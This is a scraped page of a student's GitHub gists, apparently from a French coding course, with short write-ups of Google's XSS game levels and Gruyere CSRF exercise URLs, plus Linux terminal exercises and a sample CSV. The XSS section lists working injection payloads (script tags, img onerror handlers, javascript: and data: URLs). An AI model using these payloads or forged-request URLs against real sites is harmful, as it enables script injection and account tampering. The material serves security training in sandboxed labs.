Skip to content

Instantly share code, notes, and snippets.

@Hullaballo2001
Hullaballo2001 / gist:84383b9985952df4ce376331c6a121ac
Created Oct 16, 2021
Quete XSS 3.3 [Advanced] Attaques XSS : découvrir
View gist:84383b9985952df4ce376331c6a121ac
level 1 : dans le formulaire <script>alert(1)</script>
level 2 : dans le formulaire on lui fait croire que c'est une image alors que non <img src="http://inexist.ent" onerror="javascript:alert(1)"/>
level 3 : dans l'url on echappe avec ' et on affiche une erreur https://xss-game.appspot.com/level3/frame#3' onerror='alert(1)';
level 4 : dans le formulaire 3'**alert());// car il execute directement le javascript et lance la fonction alert
level 5 : dans l'url https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1) + entrer son mail + next car dans next il executera la fonction alert
level 6 : dans l'url https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
View gist:4ba0b04c286d551be55501c19f46c654
dans le formulaire de recherche : <script>alert('hello')</script>
dans un post : <img src=x onerror="alert('Pop-up window via stored XSS');"
dans l'url : https://xss-game.appspot.com/level3/frame#3 >'>"><img src=x onerror=alert(0)>
dans le timer : ');alert(/xss 4/);('
dans email : javascript:alert("XSS") et dans l'url : https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('XSS')
dans l'url : https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
View Quête CSRF 1.txt
Your Gruyere instance id is 620119290401856536461795748554137216491.
signup : rouletta/pass
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/newaccount.gtl
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/saveprofile?action=new&uid=roulietta&pw=pass&is_author=True après le submit new account
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl après création du snippet
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/snippets.gtl# après suppression du snipet + refresh
https://google-gruyere.appspot.com/620119290401856536461795748554137216491/deletesnippet?index=0 dans l'inspecteur qd on selectionne le X pour supprimer le snippet
View gist:698872f471646dfcf8f370903115713a
# Création d'un script de sauvegarde
# - Le script demande quel dossier l'utilisateur souhaite sauvegarder
# - Si le dossier n'existe pas, il affiche un message d'erreur
# - Le script demande ou sauvegarder le fichier
# - Le script demande la confirmation de sauvegarder à l'endroit choisit
# - Le script affiche un message quand la sauvegarde est correctement effectué
# - Le script demande si l'utilisateur veux sauvegarder un autre dossier
#
@Hullaballo2001
Hullaballo2001 / $ javascript_biarritz_toulouse.csv
Created Sep 15, 2021
Linux Terminal 3 Entrées sorties et redirections
View $ javascript_biarritz_toulouse.csv
We can make this file beautiful and searchable if this error is corrected: It looks like row 2 should actually have 1 column, instead of 6. in line 1.
$ cat javascript_biarritz_toulouse.csv
Agathe,Bazin,Toulouse,France,2017,JavaScript
Maurice,Munoz,Toulouse,France,2017,JavaScript
Michèle,Traore,Toulouse,France,2017,JavaScript
Aurélie,Becker,Toulouse,France,2018,JavaScript
Timothée,Henry,Toulouse,France,2018,JavaScript
Théodore,Gerard,Toulouse,France,2018,JavaScript
Maryse,Allain,Toulouse,France,2018,JavaScript
Philippe,Paris,Toulouse,France,2018,JavaScript
Henri,Guilbert,Toulouse,France,2018,JavaScript
@Hullaballo2001
Hullaballo2001 / gist:ddb0bb180e7d78539bffa071f86ec7fe
Last active Sep 15, 2021
Linux - Terminal 2 - fichiers et dossiers
View gist:ddb0bb180e7d78539bffa071f86ec7fe
**find
$ find
.
./fictional
./fictional/arrakis.jpeg
./fictional/coruscant.jpeg
./fictional/cybertron.jpeg
./inhabited
./inhabited/arrakis.jpeg
./inhabited/coruscant.jpeg
View gist:e406c3522d245e7d93581682481c3165
rouli@ROULIETTA-C3AMNNUF MINGW64 ~
$ ls
'3D Objects'/ Dropbox/ Music/ Recent@ 'Voisinage réseau'@
AppData/ Favorites/ NTUSER.DAT 'Saved Games'/ ntuser.dat.LOG1
'Application Data'@ Links/ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TM.blf Searches/ ntuser.dat.LOG2
Contacts/ 'Local Settings'@ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000001.regtrans-ms SendTo@ ntuser.ini
Cookies@ 'Menu Démarrer'@ NTUSER.DAT{739346ab-df92-11ea-835b-28cdc4bc09da}.TMContainer00000000000000000002.regtrans-ms Videos/
Documents/ 'Mes documents'@ OneDrive/
View gist:8c7c11069dedbe7ca677a50a67953087
rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
$ curl -L -o planets.zip "https://github.com/WildCodeSchool/quests-ressources/blob/master/terminal/planets.zip?raw=true"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 203k 0 203k 0 0 394k 0 --:--:-- --:--:-- --:--:-- 395k
rouli@ROULIETTA-C3AMNNUF MINGW64 ~/quests/shell
$ unzip plants.zip
unzip: cannot find or open plants.zip, plants.zip.zip or plants.zip.ZIP.